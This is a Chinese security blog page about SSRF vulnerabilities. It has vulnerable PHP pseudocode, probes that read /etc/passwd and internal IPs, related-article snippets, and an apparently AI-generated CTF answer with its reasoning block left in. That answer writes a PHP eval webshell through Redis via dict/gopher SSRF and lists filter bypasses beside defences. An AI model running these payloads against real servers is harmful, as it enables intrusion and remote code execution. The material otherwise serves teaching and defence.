web漏洞-SSRF服务端请求伪造

原创 已于 2023-10-06 17:43:04 修改 · 1.2k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全 #web安全

于 2023-10-06 17:38:08 首次发布
本文详细解释了SSRF漏洞的定义、常见成因、漏洞探测方法、利用实例,以及如何通过防御策略来保护web应用,特别关注了SSRF如何突破内网安全。

目录

SSRF服务端请求伪造

一、定义

SSRF(Server-Side Request Forgery)服务端请求为伪造,SSRF是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。

如果一个web应用会将外部输入的参数作为URL,然后访问这个URL,那么攻击者就可以构造特定的参数值让服务端访问制定的URL,该访问行为是服务器程序预期之外的,这种攻击叫做SSRF攻击,web应用中的这种漏洞叫做SSRF漏洞。这里输入的参数不一定是完整的URL,也可以是域名、IP地址、端口号等,攻击者能伪造这些值,从而使服务端访问预期外的内容。

eg:
有些提供翻译服务的网站允许用户提交一个网页的URL,然后对整个网页进行翻译,再返回翻译后的结果。
伪代码:

  <?php 
		$content = file_get_contents($_GET['url']);
		echo translate($content);
	  ?>

由于服务端的翻译引擎必须访问网页的URL获取原始内容,如果攻击者构造特定的URL,就可以让服务端作为代理去访问它,并且获取访问的结果。
类似的场景有很多
比如:
1.web应用需要调用不同的外部接口,让客户端提交接口的地址;
2.在一些允许用户提交一个图片URL作为头像的应用种,web应用需要拉去这个图片并裁剪,这些场景都有可能存在SSRF漏洞。

url link探测内网信息:
Web 应用一般都有自己的内网环境,它与外网是隔离的,攻击者无法直接访问内网服务但是通过Web应用的SSRF 漏洞,攻击者可以访问内网服务或者对内网应用发起攻击,这是常见的SSRF攻击方式。

例如:
/translate.php?url=http://192.168.1.100:8080/
这种攻击与之前讲的远程文件包含有点像,只不过远程文件包含指的是服务端应用加载和执行远程脚本,实际上远程文件包含漏洞也是 SSRF 漏洞。此外,存在 SSRF 漏洞的应用如果使用 fle://协议,攻击者也能读取服务器上的本地文件,从而导致敏感信息泄露

比如:
/translate.php?url=file:///etc/passwd
在PHP中,除了fle_get_contents函数,其他的网络库也能产生 SSRF 漏洞。

最低0.47元/天 解锁文章
服务器端请求伪造漏洞
2201_75572825的博客
08-15 1864
gopher 协议是比 http 协议更早出现的协议,现在已经不常用了,但是在SSRF 漏洞利用中 gopher可以说是万金油,因为可以使用 gopher 发送各种格式的请求包,可以攻击内网的 FTP、Telnet、Redis.Memcache,也可以进行GET、POST请求,还可以攻击内网未授权MySQL。攻击者可以在SSRF漏洞中注入带有DNSLog服务地址的URL,并将该URL发送到目标服务器上,当目标服务器对该URL进行请求时,DNSLog服务将接收到请求并记录在日志中。回车换行使用%0d%0a。
Web渗透-SSRF服务端请求伪造
WolvenSec的博客
06-22 1374
SSRF(Server-Side Request Forgery,服务器端请求伪造)是一种由攻击者利用漏洞服务器发送恶意请求的攻击方式。SSRF漏洞通常出现在服务器端web应用中,应用允许用户提供的输入被服务器用来发起请求,而没有对输入进行充分的验证或限制。这使得攻击者可以构造恶意请求,访问内部资源或服务,甚至在某些情况下,控制服务器。
Web Security 之 Server-side request forgery
javagty6778的博客
02-17 233
不可见SSRF漏洞是指,可以诱导应用程序向提供的 URL 发出后端 HTTP 请求,但来自后端请求的响应没有在应用程序的前端响应中返回。
SSRF漏洞】Server-Side Request Forgery 服务器端请求伪造
最新发布
2302_80252080的博客
10-15 898
摘要:SSRF服务器端请求伪造)是一种利用服务器发起非预期网络请求漏洞,攻击者可借此访问内部资源或云元数据。常见危害包括内网端口扫描、文件读取、内部API调用、DoS攻击等。触发点包括任何允许用户控制外部资源访问的接口,如文件抓取、WebHook、在线翻译等。典型防御措施包括白名单限制、协议过滤、禁用重定向和内网隔离。实验演示了如何利用dict协议探测内网端口和通过file协议读取系统文件。防御关键在于严格限制服务器发起的请求目标,防止其成为攻击内网的跳板。(149字)
【Academy】SSRF ------ Server-side request forgery
D-river博客
03-12 1074
服务器端请求伪造是一种 Web 安全漏洞,它允许攻击者使服务器端应用程序向意外位置发出请求。在典型的 SSRF 攻击中,攻击者可能会导致服务器连接到组织基础设施中的仅限内部的服务。在其他情况下,它们可能能够强制服务器连接到任意外部系统。这可能会泄露敏感数据,例如授权凭证。
DAY57WEB 攻防-SSRF 服务端请求&Gopher 伪协议&无回显利用&黑白盒挖掘&业务功能点
m0_74402888的博客
10-19 1089
一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。Web常见访问,如http://127.0.0.1、http://127.0.0.1:8080、http://192.168.1.1、http://192.168.1.2等。可以防止类似于file:///,gopher://,ftp:// 等引起的问题。从文件系统中获取文件内容,如,file:///etc/passwd、file:///D:/1.txt。file:/// 从文件系统中获取文件内容,如,file:///etc/passwd。
SSRF服务端请求伪造
saber的博客
10-29 997
全面介绍了服务端请求伪造(SSRF)漏洞及其相关概念、形成原因、危害、检测方法和利用技巧。首先,解释了什么是SSRF,即攻击者通过构造恶意请求,迫使服务器代表攻击者而非正常用户向其他服务器发起请求漏洞。此漏洞通常允许攻击者访问到原本不可见的内部网络资源,从而造成潜在的安全威胁。
网络安全的神秘世界】ssrf服务端请求伪造
菜鸟小羊的博客
09-15 2889
SSRF(Server-Side Request Forgery:服务端请求伪造)是由攻击者构造形成,由服务端发起请求的一种安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。正是因为它是由服务端发起的,所以它能够访问到与它相连而与外网隔离的内部系统csrf:客户端请求伪造伪造了一个请求发送给客户端让用户去访问ssrf服务端请求伪造伪造了一个请求发送给服务端去访问XXE:外部实体注入攻击。由于程序在解析输入XML数据时,没有进行充分过滤,解析了攻击者伪造的外部实体而产生的漏洞
SSRF(服务器端请求伪造漏洞)
broing55的博客
03-05 686
SSRF(服务器端请求伪造漏洞) SSRF-漏洞介绍 SSRF漏洞SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由恶意访问者构造形成由服务端发起请求的一个安全漏洞。 一般情况下,SSRF访问的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的...
[20][03][79] Server-Side Request Forgery
安全新司机
01-12 3660
文章目录1. 问题描述2. 问题场景2.1 函数详解2.1.1 URL2.1.2 URLConnection2.1.3 HttpURLConnection2.2 可能存在漏洞的点2.2.1 HttpURLConnection2.2.2 URLConnection2.2.2.1 使用 file 协议2.2.2.2 使用 netdoc 协议2.2.2.3 使用 jar 协议2.2.2.4 jar+http2.2.3 ImageIO2.2.4 HttpClients2.2.5 OkHttpClient 1. 问题
Server-Side Request Forgery服务器端请求伪造(ssrf)
Idealismi的博客
04-27 487
我们使用端口访问文件,可以看到有一个过滤条件,它限制了file,dict协议,127.0.0.1和localhost 也不能用,其实就是不想你探测内网端口,也不能读取内网服务文件。所以我们可以在172.19.0.3地址上进行测试端口,端口不一样,值也不一样。我们可以看到出现了php页面、主机名为:172.19.0.3端口为:80。我们可以看到upload具有可执行权限、可以通过这个目录进行访问。此时可以看到容器已经启动成功、并且成功的拉取到ssrfme镜像。获取到shell后、传递到路径里。
SSRF服务器端请求伪造漏洞
一期一会的博客
01-23 1799
0x00 漏洞描述 SSRF(Server-Side Request Forgery)服务器端请求伪造。是一种由恶意访问者构造形成由服务端发起请求的一个安全漏洞。 一般情况下,SSRF访问的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。 比如从指定URL地址获取网页文本内容,加载指定地址的图片,下载等等。 0x01 影响版本 curl功能开
SSRF漏洞服务器端请求伪造
赤赤三的博客
03-21 2378
中间人(SSRF就是中间人)攻击,服务端请求伪造,主要攻击内网,打redis和weblogic特别厉害,目标网站的内部系统(他是从内部系统访问的,所以通过它攻击外部系统无法访问的内部系统,也就是目标网站当成中间人)。 大部分漏漏洞都是参数给变量的时候没有做任何限制导致漏洞。 攻击主要结果: 写webshell(需要知道web路径,有增删改查权限,gopher协议的使用,使用工具生成gopher 攻击ssrfpayload) 反弹shell(获取操作系统命令) 原理: 根本原因: SS.
Bug.Bounty.Bootcamp:Chapter 13: Server-Side Request Forgery
lm19770429的专栏
03-02 4350
SSRF vulnerabilities occur when an attacker finds a way to send requests as a trusted server in the target’s network. By forging requests from trusted servers, an attacker can pivot into an organization’s internal network and conduct all kinds of malicio.
(十一)Server-side request forgery (SSRF)
weixin_43047908的博客
04-16 3649
目录前言一、什么是SSRF?二、SSRF攻击有什么影响?常见的SSRF攻击针对服务器本身的SSRF攻击针对其他后端系统的SSRF攻击规避SSRF的常见防御措施具有基于黑名单的输入过滤器的SSRF具有基于白名单的输入过滤器的SSRF通过开放重定向绕过SSRF过滤器查找SSRF漏洞的隐藏攻击面请求中的部分URL数据格式内的URL通过Referer标头的SSRF 前言 我们将解释什么是服务器端请求伪造,描述一些常见示例,并解释如何查找和利用各种SSRF漏洞。 一、什么是SSRF服务器端请求伪造(也称为SS
开发安全之:Server-Side Request Forgery
irizhao的专栏
01-20 1012
如果需要提供用户数据来构建目的地 URI,请采用间接方法:例如创建一份合法资源名的列表,并且规定用户只能选择其中的文件名。但在某些情况下,这种方法并不可行,因为这样一份合法资源名的列表过于庞大,维护难度过大。但是,任何这样一个列表都不可能是完整的,而且将随着时间的推移而过时。更好的方法是创建一个字符列表,允许其中的字符出现在资源名称中,且只接受完全由这些被认可的字符组成的输入。网络连接源自于应用程序服务器内部 IP 地址,因此攻击者将可以使用此连接来避开网络控制,并扫描或攻击没有以其他方式暴露的内部资源。
Pikachu SSRF(Server-Side Request Forgery:服务器端请求伪造)
永不垂头的博客
08-19 500
Pikachu SSRF(Server-Side Request Forgery:服务器端请求伪造) 文章目录Pikachu SSRF(Server-Side Request Forgery:服务器端请求伪造)一、SSRF概述二、SSRF(curl)实验步骤三、SSRF(file_get_content)实验步骤四、我的公众号 一、SSRF概述 SSRF(Server-Side Request Forgery:服务器端请求伪造) 其形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能,但又没有对目
ctf-ssrf-redis
06-14
<think>我们正在讨论CTF比赛中与SSRF(Server-SideRequestForgery)和Redis相关的攻击或防御技巧。根据提供的引用,攻击者常利用SSRF漏洞通过特定的协议(如dict或gopher)与内网的Redis服务交互,进而实现未授权访问、写入Webshell或执行其他恶意操作。以下是相关的攻击技巧和防御方法的总结:###攻击技巧1.**利用dict协议攻击Redis**(引用[1]):-通过SSRF发送dict协议的请求到Redis服务,可以执行Redis命令。-典型攻击步骤:-设置Redis的工作目录:`configsetdir/var/www/html`-设置保存的文件名:`configsetdbfilenamewebshell.php`-写入Webshell内容:`settest"<?php@eval($_POST['cmd']);?>"`(注意:这里的引号需要正确转义)-保存:`save`-这样就在Web目录下写入了webshell.php文件,攻击者可以通过蚁剑等工具连接。2.**利用gopher协议攻击Redis**(引用[2]):-gopher协议功能更强大,可以发送多行命令。-使用工具(如gopherus)生成攻击payload:-生成Redis的payload:`./gopherus.py--exploitredis`-输入要执行的PHP代码(如`<?phpeval($_POST["123"]);?>`),生成gopher链接。-由于gopher协议在传输中需要正确编码,通常需要二次URL编码。-将生成的payload通过SSRF漏洞发送,即可在目标服务器上写入Webshell。3.**绕过过滤**(引用[3]):-题目中可能过滤了`file://`、`dict`、`127.0.0.1`、`localhost`等关键词。-绕过方法:-使用IP的十进制表示(如`2130706433`代表`127.0.0.1`)或`0.0.0.0`。-使用DNS重绑定技术。-使用非标准端口或协议(如http协议访问Redis的6379端口,但Redis不支持HTTP,所以通常用gopher或dict)。-利用URL解析特性,如`http://abc@127.0.0.1`、`http://127.0.0.1:80@evil.com`等。###防御技巧1.**过滤输入**:-对用户输入的URL进行严格检查,禁止访问内网IP和特殊协议(如dict、gopher)。-使用正则表达式过滤,但要注意绕过技巧(如IP的多种表示形式)。2.**限制协议**:-只允许HTTP/HTTPS协议,禁止其他协议。3.**网络隔离**:-将关键服务(如Redis)置于内网,并设置防火墙规则,禁止外部访问。4.**Redis安全配置**:-为Redis设置强密码认证。-限制Redis的绑定IP(不要绑定在0.0.0.0)。-以低权限用户运行Redis,并限制其文件写入权限。5.**使用SSRF防护机制**:-服务端设置请求的目标地址白名单。-使用DNS解析并验证目标IP是否在允许范围内。###示例:攻击Redis写入Webshell假设存在SSRF漏洞,且内网Redis无认证,攻击者可以构造如下dict协议的请求(注意空格和换行需要正确编码):```dict://127.0.0.1:6379/configsetdir/var/www/htmldict://127.0.0.1:6379/configsetdbfilenameshell.phpdict://127.0.0.1:6379/settest"<?php@eval($_POST['cmd']);?>"dict://127.0.0.1:6379/save```但实际中,由于dict协议一次只能发送一个命令,且需要多个请求,因此通常使用gopher协议在一个请求中发送多个命令。###注意事项-在CTF中,Redis可能运行在非默认端口或需要绕过过滤。-写入Webshell的路径需要可写,且Web服务器能够解析。§§相关问题§§1.如何防御SSRF攻击Redis?2.在CTF中,如果过滤了dict和gopher协议,还有哪些方法可以利用SSRF攻击Redis?3.Redis除了写入Webshell,还可以利用SSRF进行哪些攻击?</think>### CTF SSRF Redis攻击与防御技巧 在CTF比赛中,SSRF服务端请求伪造)结合Redis的攻击是常见题型。以下是关键技巧总结: --- #### **攻击技巧(利用SSRF操作Redis)** 1. **协议利用** - **dict协议**:直接发送Redis命令(需URL编码) ```http dict://127.0.0.1:6379/CONFIG%20SET%20dir%20/var/www/html ``` - **gopher协议**(更强大):支持多行命令,常用工具`gopherus`生成Payload ```python # 生成Payload示例(自动处理换行编码) ./gopherus.py --exploit redis ``` 2. **写入Webshell** - 经典四步操作: ```redis CONFIG SET dir /var/www/html # 设置保存目录 CONFIG SET dbfilename shell.php # 设置文件名 SET payload "<?php eval($_POST['cmd']);?>" # 写入恶意代码 SAVE # 保存到文件 ``` - 需注意特殊字符转义(如`<`需转为`<`) 3. **绕过过滤** - **IP绕过**:用`0.0.0.0`、`2130706433`(127.0.0.1的整数形式)或`localhost`替代 - **协议绕过**:若过滤`dict/gopher`,尝试`http://0.0.0.0:6379/?`(需Redis支持HTTP) - **分块编码**:对Payload二次URL编码(引用[2]示例) 4. **其他利用方式** - 写计划任务:`CONFIG SET dir /var/spool/cron/` - 主从复制攻击:通过`SLAVEOF`命令控制Redis从恶意服务器加载模块 - 读取敏感文件:`CONFIG GET *`获取Redis配置 --- #### **防御技巧** 1. **输入过滤** - 协议黑名单:禁用`file://`、`dict://`、`gopher://` - IP/域名限制:过滤`127.0.0.1`、`localhost`、内网IP段 - 正则强化:检测异常路径(如`/var/spool/cron`) 2. **Redis加固** ```bash # 关键配置 bind 127.0.0.1 # 只监听本地 requirepass "强密码" # 启用认证 rename-command CONFIG "" # 禁用危险命令 ``` 3. **服务隔离** - 将Redis部署在内网,禁止公网访问 - 使用防火墙限制6379端口的来源IP 4. **权限控制** - Redis以低权限用户运行(非root) - 限制Web目录写权限(防止写Shell) --- #### **CTF实战要点** 1. **判断Redis存在**:尝试访问`http://target:6379`若返回`-ERR wrong number of arguments`则存在。 2. **编码处理**: - 使用工具(如gopherus)自动生成编码后的Payload - 二次URL编码绕过WAF(引用[2]案例) 3. **回显利用**:若命令无回显,可通过延时或DNS外带数据判断执行结果。 > 参考案例:某CTF题通过SSRF的gopher协议发送Redis命令写入Webshell,最终用蚁剑连接获取flag(引用[2])。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值